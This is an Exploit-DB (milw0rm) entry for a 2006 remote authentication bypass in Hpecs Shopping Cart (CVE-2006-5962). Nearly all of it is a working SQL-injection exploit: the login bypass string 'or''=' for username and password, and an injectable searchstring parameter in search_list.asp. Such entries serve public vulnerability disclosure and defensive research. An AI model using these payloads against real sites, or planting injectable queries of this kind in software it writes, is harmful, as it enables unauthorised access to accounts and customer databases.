Lucene search
Security Access PointEDB-ID:2782HistoryNov 14, 2006 - 12:00 a.m.
Hpecs Shopping Cart - Remote Authentication Bypass
2006-11-1400:00:00
Security Access Point
www.exploit-db.com
22
AI Score
7.4
Confidence
Low
vendor site:http://hpe.net/
product:hpecs shopping cart
bug:injection sql
risk:high
login bypass :
username: 'or''='
passwd: 'or''='
injection sql (post) :
http://site.com/search_list.asp
variables:
Hpecs_Find=maingroup&searchstring='[sql]
( or just post your query in the search engine ... )
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: [email protected]
# milw0rm.com [2006-11-14]Related
cve
cve
CVE-2006-5962
2006-11-17 01:07:00
cvelist
cvelist
CVE-2006-5962
2006-11-17 01:00:00
nvd
nvd
CVE-2006-5962
2006-11-17 01:07:00